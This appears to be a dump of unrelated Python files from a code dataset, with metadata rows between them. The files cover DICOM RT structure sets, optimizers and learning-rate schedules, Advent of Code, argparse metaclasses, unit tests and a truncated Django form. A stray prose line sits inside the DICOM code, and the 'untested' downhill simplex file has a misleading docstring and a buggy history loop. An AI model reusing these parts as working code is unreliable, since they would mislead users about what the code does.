        contour_data = Dataset()
        contour_data.ReferencedSOPClassUID = series_info['SOPClassUID']
        contour_data.ReferencedSOPInstanceUID = slice_info[str(slice_z)]
        contour_sequence.append(contour_data)

    referenced_series = Dataset()
    referenced_series.SeriesInstanceUID = series_info['SeriesInstanceUID']
    referenced_series.ContourImageSequence = contour_sequence

    referenced_study = Dataset()
    referenced_study.ReferencedSOPClassUID = '1.2.840.10008.3.1.2.3.2'
    referenced_study.ReferencedSOPInstanceUID = series_info['StudyInstanceUID']
    referenced_study.RTReferencedSeriesSequence = Sequence([referenced_series])

    frame_of_ref_data = Dataset()
    frame_of_ref_data.FrameOfReferenceUID = series_info['FrameOfReferenceUID']
    frame_of_ref_data.RTReferencedStudySequence = Sequence([referenced_study])
    ds.ReferencedFrameOfReferenceSequence = Sequence([frame_of_ref_data])

    roi_sequence = Sequence()
    roi_observations = Sequence()
    for label_number in range(0, len(label_names)):
        roi_data = Dataset()
        roi_obs = Dataset()
        roi_data.ROINumber = label_number + 1
        roi_obs.ObservationNumber = label_number + 1
        roi_obs.ReferencedROINumber = label_number + 1
        roi_data.ReferencedFrameOfReferenceUID = series_info['FrameOfReferenceUID']
        roi_data.ROIName = label_names[label_number]
        roi_data.ROIObservationDescription = ''
        roi_data.ROIGenerationAlgorithm = 'Atlas-based'
        roi_data.ROIGenerationMethod = 'Python'
        roi_obs.RTROIInterpretedType = ''
        roi_obs.ROIInterpreter = ''
        roi_sequence.append(roi_data)
        roi_observations.append(roi_obs)
    ds.StructureSetROISequence = roi_sequence
    ds.RTROIObservationsSequence = roi_observations

    # as if that wasn't bad enough, now we have to add the contours!
    label_data = sITK.GetArrayFromImage(labels)
    roi_contour_sequence = Sequence()
    for label_number in range(0, len(label_names)):
        roi_contour_data = Dataset()
        roi_contour_data.ROIDisplayColor = '255\\0\\0'
        roi_contour_data.ReferencedROINumber = label_number + 1
        contour_sequence = Sequence()
        # convert labels to polygons
        contour_number = 0
        for slice_number in range(0, labels.GetSize()[2] - 1):
            slice_data = label_data[slice_number, :, :]
            slice_for_label = np.where(slice_data != label_number + 1, 0, slice_data)
            if np.any(np.isin(slice_for_label, label_number + 1)):
                contours = measure.find_contours(slice_for_label, (float(label_number + 1) / 2.0))
                for contour in contours:
                    # Convert to real world and add z_position
                    # plt.imshow(slice_data)
                    # plt.plot(contour[:, 1], contour[:, 0], color='#ff0000')
                    contour_as_string = ''
                    is_first_point = True
                    for point in contour[:-1]:
                        real_contour = [point[1] * spacing[0] + origin[0], point[0] * spacing[1] + origin[1],
                                        z_values[slice_number]]
                        if not is_first_point:
                            contour_as_string = contour_as_string + '\\'
                        else:
                            is_first_point = False
                        contour_as_string = contour_as_string + str(real_contour[0]) + '\\'
                        contour_as_string = contour_as_string + str(real_contour[1]) + '\\'
                        contour_as_string = contour_as_string + str(real_contour[2])
                    contour_number = contour_number + 1
                    contour_data = Dataset()
                    contour_data.ContourGeometricType = 'CLOSED_PLANAR'
                    contour_data.NumberOfContourPoints = str(len(contour))
                    contour_data.ContourNumber = str(contour_number)
                    image_data = Dataset()
                    image_data.ReferencedSOPClassUID = series_info['SOPClassUID']
                    image_data.ReferencedSOPInstanceUID = slice_info[str(z_values[slice_number])]
                    contour_data.ContourImageSequence = Sequence([image_data])
                    contour_data.ContourData = contour_as_string
                    contour_sequence.append(contour_data)
        roi_contour_data.ContourSequence = contour_sequence
        roi_contour_sequence.append(roi_contour_data)
    ds.ROIContourSequence = roi_contour_sequence

    ds.ApprovalStatus = 'UNAPPROVED'
    ds.save_as(output_filename)
    return

def read_contours(structure_file):
    # code from xuefeng
    # http://aapmchallenges.cloudapp.net/forums/3/2/
    contours = []
    contour_names = []
    for i in range(len(structure_file.ROIContourSequence)):
        contour = {'color': structure_file.ROIContourSequence[i].ROIDisplayColor,
                   'number': structure_file.ROIContourSequence[i].ReferencedROINumber,
                   'name': structure_file.StructureSetROISequence[i].ROIName}
        assert contour['number'] == structure_file.StructureSetROISequence[i].ROINumber
        contour['contours'] = [s.ContourData for s in structure_file.ROIContourSequence[i].ContourSequence]
        contours.append(contour)
        contour_names.append(contour['name'])
    return contours, contour_names

def get_mask(contours, slices, image):
    # code from xuefeng
    # http://aapmchallenges.cloudapp.net/forums/3/2/
    z = [s.ImagePositionPatient[2] for s in slices]
    pos_r = slices[0].ImagePositionPatient[1]
    spacing_r = slices[0].PixelSpacing[1]
    pos_c = slices[0].ImagePositionPatient[0]
    spacing_c = slices[0].PixelSpacing[0]
    im_dims = image.shape
    label = np.zeros([im_dims[2], im_dims[1], im_dims[0]], dtype=np.uint8)
    z_index = 0
    for con in contours:
        num = int(con['number'])
        for c in con['contours']:
            nodes = np.array(c).reshape((-1, 3))
            assert np.amax(np.abs(np.diff(nodes[:, 2]))) == 0
            zNew = [round(elem, 1) for elem in z]
            try:
                z_index = z.index(nodes[0, 2])
            except ValueError:
                try:
                    z_index = zNew.index(round(nodes[0, 2], 1))
                except ValueError:
                    print('Slice not found for ' + con['name'] + ' at z = ' + str(nodes[0, 2]))
            r = (nodes[:, 1] - pos_r) / spacing_r
            c = (nodes[:, 0] - pos_c) / spacing_c
            rr, cc = polygon(r, c)
            label[z_index, rr, cc] = num
    return sITK.GetImageFromArray(label)
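A hedged round-trip sketch for the reader/writer pair above; the paths are assumptions, and ct_directory needs a trailing slash because the writer concatenates it with file names:

# Hypothetical round trip (paths assumed).
labels, names = read_rtss_to_sitk("rtss.dcm", "ct_slices/")
write_rtss_from_sitk(labels, names, "ct_slices/", "rtss_copy.dcm")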
| 44.526132
| 120
| 0.642069
| 1,456
| 12,779
| 5.414148
| 0.223214
| 0.025371
| 0.019028
| 0.013954
| 0.126728
| 0.071927
| 0.068121
| 0.066218
| 0.066218
| 0.049474
| 0
| 0.026108
| 0.26567
| 12,779
| 286
| 121
| 44.681818
| 0.813939
| 0.083418
| 0
| 0.063927
| 0
| 0.009132
| 0.062407
| 0.016062
| 0
| 0
| 0
| 0.003497
| 0.009132
| 1
| 0.018265
| false
| 0
| 0.050228
| 0
| 0.09589
| 0.004566
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b59742af888cb2d88c4cbf6cba219ceb64599613
| 2,364
|
py
|
Python
|
code/opt_algo/downhillsimplex_untested.py
|
nicolai-schwartze/Masterthesis
|
7857af20c6b233901ab3cedc325bd64704111e16
|
[
"MIT"
] | 1
|
2020-06-13T10:02:02.000Z
|
2020-06-13T10:02:02.000Z
|
code/opt_algo/downhillsimplex_untested.py
|
nicolai-schwartze/Masterthesis
|
7857af20c6b233901ab3cedc325bd64704111e16
|
[
"MIT"
] | null | null | null |
code/opt_algo/downhillsimplex_untested.py
|
nicolai-schwartze/Masterthesis
|
7857af20c6b233901ab3cedc325bd64704111e16
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 20 14:03:18 2020

@author: Nicolai
"""

import sys
sys.path.append("../differential_evolution")
from JADE import JADE
import numpy as np
import scipy as sc
import testFunctions as tf

def downhillsimplex(population, function, minError, maxFeval):
    '''
    implementation of a memetic JADE: \n
    maxFeval-2*dim of the function evaluations are spent on JADE
    2*dim of the function evaluations are used to perform a downhill simplex
    internal parameters of JADE are set to p=0.3 and c=0.5

    Parameters
    ----------
    population: numpy array
        2D numpy array where rows are candidates and columns are the dimensions
    function: function
        fitness function that is optimised
    minError: float
        stopping condition on function value
    maxFeval: int
        stopping condition on max number of function evaluations

    Returns
    -------
    history: tuple
        tuple[0] - popDynamic
        tuple[1] - FEDynamic
        tuple[2] - FDynamic
        tuple[3] - CRDynamic

    Examples
    --------
    >>> import numpy as np
    >>> def sphere(x):
    ...     return np.dot(x, x)
    >>> minError = -1*np.inf
    >>> maxGen = 10**3
    >>> population = 100*np.random.rand(50, 2)
    >>> (popDynamic, FEDynamic, FDynamic, CRDynamic) = \
    ...     JADE(population, sphere, minError, maxGen)
    '''
    psize, dim = population.shape
    startSolution = population[np.random.randint(0, high=psize)]
    _, _, _, _, _, allvecs = sc.optimize.fmin(function, startSolution, ftol=minError,
                                              maxfun=maxFeval,
                                              full_output=True, retall=True)
    FDynamic = []
    CRDynamic = []
    popDynamic = []
    FEDynamic = []
    for x in allvecs:
        popDynamic.append(np.array([x]))
        FEDynamic.append(function(allvecs[-1]))
    return (popDynamic, FEDynamic, FDynamic, CRDynamic)

if __name__ == "__main__":
    import matplotlib.pyplot as plt
    population = 100*np.random.rand(4, 2)
    minError = 10**-200
    maxFeval = 10**3
    H = 100
    p = 0.3
    c = 0.5
    (popDynamic, FEDynamic, FDynamic, CRDynamic) = downhillsimplex(population,
                                                                   tf.sphere, minError, maxFeval)
    plt.semilogy(FEDynamic)
| 26.863636
| 87
| 0.593909
| 270
| 2,364
| 5.144444
| 0.462963
| 0.054716
| 0.058315
| 0.077754
| 0.074874
| 0.038877
| 0
| 0
| 0
| 0
| 0
| 0.033878
| 0.300761
| 2,364
| 88
| 88
| 26.863636
| 0.806413
| 0.436971
| 0
| 0
| 0
| 0
| 0.028473
| 0.02157
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.193548
| 0
| 0.258065
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b59a516d2e4ba77e47687f54990e9a2e4f955197
| 1,185
|
py
|
Python
|
LoopStructural/modelling/features/lambda_geological_feature.py
|
wgorczyk/LoopStructural
|
bedc7abd4c1868fdbd6ed659c8d72ef19f793875
|
[
"MIT"
] | 67
|
2020-06-25T06:50:58.000Z
|
2022-03-29T17:15:43.000Z
|
LoopStructural/modelling/features/lambda_geological_feature.py
|
wgorczyk/LoopStructural
|
bedc7abd4c1868fdbd6ed659c8d72ef19f793875
|
[
"MIT"
] | 60
|
2020-06-28T22:58:21.000Z
|
2022-03-24T01:30:59.000Z
|
LoopStructural/modelling/features/lambda_geological_feature.py
|
wgorczyk/LoopStructural
|
bedc7abd4c1868fdbd6ed659c8d72ef19f793875
|
[
"MIT"
] | 9
|
2020-06-25T13:07:39.000Z
|
2021-12-01T01:41:24.000Z
|
"""
Geological features
"""
import logging
import numpy as np
logger = logging.getLogger(__name__)
class LambdaGeologicalFeature:
def __init__(self,function = None,name = 'unnamed_lambda', gradient_function = None, model = None):
self.function = function
self.name = name
self.gradient_function = gradient_function
self.model = model
if self.model is not None:
v = function(self.model.regular_grid((10, 10, 10)))
self._min = np.nanmin(v)#function(self.model.regular_grid((10, 10, 10))))
self._max = np.nanmax(v)
else:
self._min = 0
self._max = 0
def evaluate_value(self, xyz):
v = np.zeros((xyz.shape[0]))
if self.function is None:
v[:] = np.nan
else:
v[:] = self.function(xyz)
return v
def evaluate_gradient(self,xyz):
v = np.zeros((xyz.shape[0],3))
if self.gradient_function is None:
v[:,:] = np.nan
else:
v[:,:] = self.gradient_function(xyz)
return v
def min(self):
return self._min
def max(self):
return self._max
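A hedged usage sketch: wrapping plain callables as a feature; the depth field and constant gradient are assumptions for illustration:

import numpy as np

# Hypothetical feature: scalar field = z coordinate, gradient = unit z vector.
feature = LambdaGeologicalFeature(
    function=lambda xyz: xyz[:, 2],
    gradient_function=lambda xyz: np.tile([0.0, 0.0, 1.0], (xyz.shape[0], 1)),
)
pts = np.random.rand(5, 3)
values = feature.evaluate_value(pts)     # shape (5,)
grads = feature.evaluate_gradient(pts)   # shape (5, 3)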
| 27.55814
| 103
| 0.563713
| 148
| 1,185
| 4.351351
| 0.283784
| 0.124224
| 0.093168
| 0.055901
| 0.350932
| 0.285714
| 0.285714
| 0.285714
| 0.21118
| 0.121118
| 0
| 0.021014
| 0.3173
| 1,185
| 43
| 104
| 27.55814
| 0.775031
| 0.057384
| 0
| 0.147059
| 0
| 0
| 0.012613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147059
| false
| 0
| 0.058824
| 0.058824
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b59a84378daec5c068b0ad9a5875001c348356a9
| 2,137
|
py
|
Python
|
2021/day8.py
|
Bug38/AoC
|
576ee0d3745242b71240a62c121c52bc92f7253e
|
[
"MIT"
] | null | null | null |
2021/day8.py
|
Bug38/AoC
|
576ee0d3745242b71240a62c121c52bc92f7253e
|
[
"MIT"
] | null | null | null |
2021/day8.py
|
Bug38/AoC
|
576ee0d3745242b71240a62c121c52bc92f7253e
|
[
"MIT"
] | null | null | null |
from typing import Set

import utils

data = utils.getLinesFromFile("day8.input")
# data = ['be cfbegad cbdgef fgaecd cgeb fdcge agebfd fecdb fabcd edb | fdgacbe cefdb cefbgd gcbe','edbfga begcd cbg gc gcadebf fbgde acbgfd abcde gfcbed gfec | fcgedb cgb dgebacf gc','fgaebd cg bdaec gdafb agbcfd gdcbef bgcad gfac gcb cdgabef | cg cg fdcagb cbg','fbegcd cbd adcefb dageb afcb bc aefdc ecdab fgdeca fcdbega | efabcd cedba gadfec cb','aecbfdg fbg gf bafeg dbefa fcge gcbea fcaegb dgceab fcbdga | gecf egdcabf bgf bfgea','fgeab ca afcebg bdacfeg cfaedg gcfdb baec bfadeg bafgc acf | gebdcfa ecba ca fadegcb','dbcfg fgd bdegcaf fgec aegbdf ecdfab fbedc dacgb gdcebf gf | cefg dcbef fcge gbcadfe','bdfegc cbegaf gecbf dfcage bdacg ed bedf ced adcbefg gebcd | ed bcgafe cdgba cbgef','egadfb cdbfeg cegd fecab cgb gbdefca cg fgcdab egfdb bfceg | gbdfcae bgc cg cgb','gcafb gcf dcaebfg ecagb gf abcdeg gaef cafbge fdbac fegbdc | fgae cfgab fg bagce']
# data = ['acedgfb cdfbe gcdfa fbcad dab cefabd cdfgeb eafb cagedb ab | cdfeb fcadb cdfeb cdbaf']

inputs, outputs = [], []
for d in data:
    a, b = d.split('|')
    inputs.append(a.strip().split())
    outputs.append(b.strip().split())

def part1():
    ret = 0
    for os in outputs:
        for o in os:
            if len(o) in [2, 3, 4, 7]:
                ret += 1
    return ret

def part2():
    ret = 0
    for i, ins in enumerate(inputs):
        ins = sorted(ins, key=len)
        # known digits by segment count: 1 (2 segments), 7 (3), 4 (4), 8 (7)
        wires = [0, ins[0], 0, 0, ins[2], 0, 0, ins[1], ins[-1], 0]
        for w in ins:
            if len(w) in [2, 3, 4, 7]:
                continue
            if len(w) == 5 and set(wires[1]).issubset(set(w)):
                wires[3] = w
                continue
            if len(w) == 6 and set(wires[3]).issubset(set(w)):
                wires[9] = w
                continue
            elif len(w) == 6 and set(wires[1]).issubset(set(w)):
                wires[0] = w
                continue
            elif len(w) == 6:
                wires[6] = w
                continue
        for w in ins:
            if w in wires:
                continue
            if set(w).issubset(set(wires[6])):
                wires[5] = w
            else:
                wires[2] = w
        value = ""
        for o in outputs[i]:
            # use `digit` rather than reusing `i`, which would shadow the outer index
            for digit, w in enumerate(wires):
                if set(o) == set(w):
                    value += str(digit)
                    break
        ret += int(value)
    return ret

print(f'Part1: {part1()}')
print(f'Part2: {part2()}')
| 35.616667
| 860
| 0.657932
| 364
| 2,137
| 3.862637
| 0.535714
| 0.010669
| 0.012802
| 0.036273
| 0.102418
| 0.078236
| 0.041252
| 0.041252
| 0
| 0
| 0
| 0.025045
| 0.215255
| 2,137
| 59
| 861
| 36.220339
| 0.813357
| 0.44642
| 0
| 0.230769
| 0
| 0
| 0.036441
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0
| 0.038462
| 0
| 0.115385
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b59c0e7ce913172c25c6a249bc299d0133408394
| 4,951
|
py
|
Python
|
utils/optimizers.py
|
csalt-research/OpenASR-py
|
9aea6753689d87d321260d7eb0ea0544e1b3403a
|
[
"MIT"
] | 2
|
2019-11-29T15:46:14.000Z
|
2021-05-28T06:54:41.000Z
|
utils/optimizers.py
|
csalt-research/OpenASR-py
|
9aea6753689d87d321260d7eb0ea0544e1b3403a
|
[
"MIT"
] | null | null | null |
utils/optimizers.py
|
csalt-research/OpenASR-py
|
9aea6753689d87d321260d7eb0ea0544e1b3403a
|
[
"MIT"
] | null | null | null |
""" Optimizers class """
import torch
import torch.optim as optim
from torch.nn.utils import clip_grad_norm_
import operator
import functools
from copy import copy
from math import sqrt
def build_torch_optimizer(model, opt):
params = [p for p in model.parameters() if p.requires_grad]
if opt.optim == 'sgd':
optimizer = optim.SGD(
params,
lr=opt.learning_rate)
elif opt.optim == 'adagrad':
optimizer = optim.Adagrad(
params,
lr=opt.learning_rate,
initial_accumulator_value=opt.adagrad_accumulator_init)
elif opt.optim == 'adadelta':
optimizer = optim.Adadelta(
params,
lr=opt.learning_rate)
elif opt.optim == 'adam':
optimizer = optim.Adam(
params,
lr=opt.learning_rate,
betas=[opt.adam_beta1, opt.adam_beta2],
eps=1e-9)
else:
raise ValueError('Invalid optimizer type: ' + opt.optim)
return optimizer
def make_lr_decay_fn(opt):
if opt.decay_method == 'noam':
return functools.partial(
noam_decay,
warmup_steps=opt.warmup_steps,
model_size=opt.dec_rnn_size)
elif opt.decay_method == 'noamwd':
return functools.partial(
noamwd_decay,
warmup_steps=opt.warmup_steps,
model_size=opt.dec_rnn_size,
rate=opt.learning_rate_decay,
decay_steps=opt.decay_steps,
start_step=opt.start_decay_steps)
elif opt.decay_method == 'rsqrt':
return functools.partial(
rsqrt_decay, warmup_steps=opt.warmup_steps)
elif opt.start_decay_steps is not None:
return functools.partial(
exponential_decay,
rate=opt.learning_rate_decay,
decay_steps=opt.decay_steps,
start_step=opt.start_decay_steps)
def noam_decay(step, warmup_steps, model_size):
"""
Learning rate schedule described in
https://arxiv.org/pdf/1706.03762.pdf.
"""
return (
model_size ** (-0.5) *
min(step ** (-0.5), step * warmup_steps**(-1.5)))
def noamwd_decay(step, warmup_steps, model_size,
rate, decay_steps, start_step=0):
"""
Learning rate schedule optimized for huge batches
"""
return (
model_size ** (-0.5) *
min(step ** (-0.5), step * warmup_steps**(-1.5)) *
rate ** (max(step - start_step + decay_steps, 0) // decay_steps))
def exponential_decay(step, rate, decay_steps, start_step=0):
"""
A standard exponential decay, scaling the learning rate by :obj:`rate`
every :obj:`decay_steps` steps.
"""
return rate ** (max(step - start_step + decay_steps, 0) // decay_steps)
def rsqrt_decay(step, warmup_steps):
"""
Decay based on the reciprocal of the step square root.
"""
return 1.0 / sqrt(max(step, warmup_steps))
class Optimizer(object):
def __init__(self,
optimizer,
learning_rate,
learning_rate_decay_fn=None,
max_grad_norm=None):
self._optimizer = optimizer
self._learning_rate = learning_rate
self._learning_rate_decay_fn = learning_rate_decay_fn
self._max_grad_norm = max_grad_norm or 0
self._training_step = 1
self._decay_step = 1
@property
def training_step(self):
return self._training_step
def learning_rate(self):
if self._learning_rate_decay_fn is None:
return self._learning_rate
scale = self._learning_rate_decay_fn(self._decay_step)
return scale * self._learning_rate
def state_dict(self):
return {
'training_step': self._training_step,
'decay_step': self._decay_step,
'optimizer': self._optimizer.state_dict()
}
def load_state_dict(self, state_dict, device):
self._training_step = state_dict['training_step']
# State can be partially restored
if 'decay_step' in state_dict:
self._decay_step = state_dict['decay_step']
if 'optimizer' in state_dict:
self._optimizer.load_state_dict(state_dict['optimizer'])
# https://github.com/pytorch/pytorch/issues/2830
for state in self._optimizer.state.values():
for k, v in state.items():
if torch.is_tensor(v):
state[k] = v.to(device)
def zero_grad(self):
self._optimizer.zero_grad()
def backward(self, loss):
loss.backward()
def step(self):
learning_rate = self.learning_rate()
for group in self._optimizer.param_groups:
group['lr'] = learning_rate
if self._max_grad_norm > 0:
clip_grad_norm_(group['params'], self._max_grad_norm)
self._optimizer.step()
self._decay_step += 1
self._training_step += 1
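A hedged training-loop sketch for the wrapper above; model, opt (an argparse-style namespace), data, and compute_loss are assumptions for illustration:

# Hypothetical wiring of the Optimizer wrapper.
base = build_torch_optimizer(model, opt)
optimizer = Optimizer(base, opt.learning_rate,
                      learning_rate_decay_fn=make_lr_decay_fn(opt),
                      max_grad_norm=5.0)

for batch in data:
    optimizer.zero_grad()
    loss = compute_loss(model, batch)
    optimizer.backward(loss)
    optimizer.step()  # applies the decayed LR and gradient clipping, then updates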
| 31.941935
| 75
| 0.613411
| 615
| 4,951
| 4.64878
| 0.214634
| 0.096537
| 0.044771
| 0.033228
| 0.284715
| 0.221056
| 0.173487
| 0.173487
| 0.149003
| 0.149003
| 0
| 0.011638
| 0.288427
| 4,951
| 155
| 76
| 31.941935
| 0.799886
| 0.07655
| 0
| 0.205128
| 0
| 0
| 0.0338
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.119658
| false
| 0
| 0.059829
| 0.017094
| 0.299145
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b59da18e5dee5065a74262a17b2223e79fa39bac
| 3,019
|
py
|
Python
|
src/argcompile/meta.py
|
artu-hnrq/argcompile
|
48b8997cc21b861fd090a809a9149d95476edbf8
|
[
"MIT"
] | null | null | null |
src/argcompile/meta.py
|
artu-hnrq/argcompile
|
48b8997cc21b861fd090a809a9149d95476edbf8
|
[
"MIT"
] | null | null | null |
src/argcompile/meta.py
|
artu-hnrq/argcompile
|
48b8997cc21b861fd090a809a9149d95476edbf8
|
[
"MIT"
] | null | null | null |
import inspect

class MetaComposition(type):
    """Overrides a target method so that calling it runs every same-metaclass superclass implementation in MRO order, oldest first"""

    def __new__(meta, name, bases, attr, __func__='__call__'):
        attr['__run__'] = attr[__func__]
        attr[__func__] = meta.__run__
        return super(MetaComposition, meta).__new__(
            meta, name, bases, attr
        )

    def __run__(self, *args, **kwargs):
        for compound in self.__class__.__compound__:
            compound.__run__(self, *args, **kwargs)

    @property
    def __compound__(cls):
        return [
            element
            for element in
            list(cls.__mro__)[::-1]
            if type(element)
            is type(cls)
        ]

class MetaArgumentCompiler(MetaComposition):
    """Tracks __init__ keyword arguments to manage Actions and Attributes configuration"""

    def __new__(meta, name, bases, attr):
        __config__ = attr.pop('__config__', {})
        __action__ = attr.pop('__action__', {})
        __attr__ = attr.pop('__attr__', {})

        for keys in [__action__.keys(), __attr__.keys()]:
            for key in keys:
                if key not in __config__.keys():
                    __config__[key] = {}

        __init__ = attr.pop('__init__', None)

        def init(self, *a, **kw):
            config = {}
            for key, args in __config__.items():
                if key in __action__.keys() or key in __attr__.keys():
                    config[key] = args
                    config[key].update(kw.pop(key, {}))
                else:
                    kw[key] = args
                    kw[key].update(kw.get(key, {}))

            if __init__:
                __init__(self, *a, **kw)

            for key, args in config.items():
                if key in __action__:
                    self.add_argument(
                        *config[key].pop('*', []),
                        action=__action__[key],
                        **config[key]
                    )
                else:
                    self.add_attribute(
                        __attr__[key](*config[key].pop('*', []), **config[key])
                    )

        attr['__init__'] = init
        return super(MetaArgumentCompiler, meta).__new__(meta, name, bases, attr)

    def __run__(self, namespace):
        for compiler in self.__class__.__compound__:
            namespace = compiler.__run__(self, namespace)
        return namespace

class MetaAttribute(type):
    """Overwrites the __call__ method to pop temporary arguments from the Namespace in order to process them"""

    def __new__(meta, name, bases, attr):
        if __run__ := attr.get('__call__', None):
            # NOTE: inspect.getargspec is deprecated (removed in Python 3.11);
            # inspect.getfullargspec is the modern equivalent.
            args = inspect.getargspec(__run__).args[1:]

            def __call__(self, namespace):
                attr = dict()
                for arg in args:
                    if value := getattr(namespace, arg, None):
                        attr[arg] = value
                        delattr(namespace, arg)
                __run__(self, namespace, **attr)
                return namespace

            attr['__call__'] = __call__
        return super(MetaAttribute, meta).__new__(meta, name, bases, attr)

# class Meta(type):
#     def __new__(meta, name, bases, attr):
#         """Meta description of class definition"""
#         return super(Meta, meta).__new__(meta, name, bases, attr)
#
#     def __init__(cls, name, bases, attr, compound):
#         """ Meta intervention on class instantiation """
#         return super(Meta, cls).__init__(cls, name, bases, attr)
#
#     def __call__(cls, *args):
#         """ Meta modifications in object instantiation """
#         return super(Meta, cls).__call__(cls, *args)
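A hedged demonstration of MetaComposition; Base and Child are assumptions for illustration:

# Hypothetical classes: calling an instance runs every same-metaclass
# implementation of __call__ along the MRO, oldest class first.
class Base(metaclass=MetaComposition):
    def __call__(self):
        print("Base step")

class Child(Base):
    def __call__(self):
        print("Child step")

Child()()  # prints "Base step" then "Child step"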
| 26.716814
| 100
| 0.663796
| 375
| 3,019
| 4.72
| 0.237333
| 0.050847
| 0.073446
| 0.072316
| 0.217514
| 0.159887
| 0.09435
| 0.079096
| 0.079096
| 0.040678
| 0
| 0.00082
| 0.191785
| 3,019
| 112
| 101
| 26.955357
| 0.72459
| 0.233852
| 0
| 0.083333
| 0
| 0
| 0.033654
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.013889
| 0.013889
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5a0cac842fff324e018f25672c1b93817ef376b
| 761
|
py
|
Python
|
linux/keyman-config/tests/test_gnome_keyboards_util.py
|
srl295/keyman
|
4dfd0f71f3f4ccf81d1badbd824900deee1bb6d1
|
[
"MIT"
] | null | null | null |
linux/keyman-config/tests/test_gnome_keyboards_util.py
|
srl295/keyman
|
4dfd0f71f3f4ccf81d1badbd824900deee1bb6d1
|
[
"MIT"
] | null | null | null |
linux/keyman-config/tests/test_gnome_keyboards_util.py
|
srl295/keyman
|
4dfd0f71f3f4ccf81d1badbd824900deee1bb6d1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
import unittest
from unittest.mock import patch

from keyman_config.gnome_keyboards_util import is_gnome_shell, _reset_gnome_shell

class GnomeKeyboardsUtilTests(unittest.TestCase):
    def setUp(self):
        _reset_gnome_shell()

    @patch('keyman_config.os.system')
    def test_IsGnomeShell_RunningGnomeShell(self, mockSystem):
        # Setup
        mockSystem.return_value = 0

        # Execute/Verify
        self.assertEqual(is_gnome_shell(), True)

    @patch('keyman_config.os.system')
    def test_IsGnomeShell_NotRunningGnomeShell(self, mockSystem):
        # Setup
        mockSystem.return_value = 1

        # Execute/Verify
        self.assertEqual(is_gnome_shell(), False)

if __name__ == '__main__':
    unittest.main()
| 26.241379
| 81
| 0.710907
| 86
| 761
| 5.930233
| 0.476744
| 0.098039
| 0.070588
| 0.07451
| 0.486275
| 0.486275
| 0.329412
| 0.172549
| 0
| 0
| 0
| 0.004918
| 0.198423
| 761
| 28
| 82
| 27.178571
| 0.831148
| 0.07753
| 0
| 0.125
| 0
| 0
| 0.077475
| 0.065997
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.1875
| false
| 0
| 0.1875
| 0
| 0.4375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
b5a22c7ed55e816b9317d7d3ca45276bbf0eae8f
| 4,059
|
py
|
Python
|
ghostwriter/users/forms.py
|
bbhunter/Ghostwriter
|
1b684ddd119feed9891e83b39c9b314b41d086ca
|
[
"BSD-3-Clause"
] | 1
|
2022-02-04T20:24:35.000Z
|
2022-02-04T20:24:35.000Z
|
ghostwriter/users/forms.py
|
bbhunter/Ghostwriter
|
1b684ddd119feed9891e83b39c9b314b41d086ca
|
[
"BSD-3-Clause"
] | null | null | null |
ghostwriter/users/forms.py
|
bbhunter/Ghostwriter
|
1b684ddd119feed9891e83b39c9b314b41d086ca
|
[
"BSD-3-Clause"
] | null | null | null |
"""This contains all of the forms used by the Users application."""
# Django Imports
from django.contrib.admin.widgets import FilteredSelectMultiple
from django.contrib.auth import forms, get_user_model
from django.contrib.auth.forms import UserChangeForm
from django.contrib.auth.models import Group
from django.core.exceptions import ValidationError
from django.forms import ModelForm, ModelMultipleChoiceField
from django.utils.translation import gettext_lazy as _
# 3rd Party Libraries
from crispy_forms.helper import FormHelper
from crispy_forms.layout import HTML, ButtonHolder, Column, Layout, Row, Submit
User = get_user_model()
class UserChangeForm(UserChangeForm):
"""
Update details for an individual :model:`users.User`.
"""
class Meta:
model = get_user_model()
fields = (
"email",
"name",
"timezone",
"phone",
)
def __init__(self, *args, **kwargs):
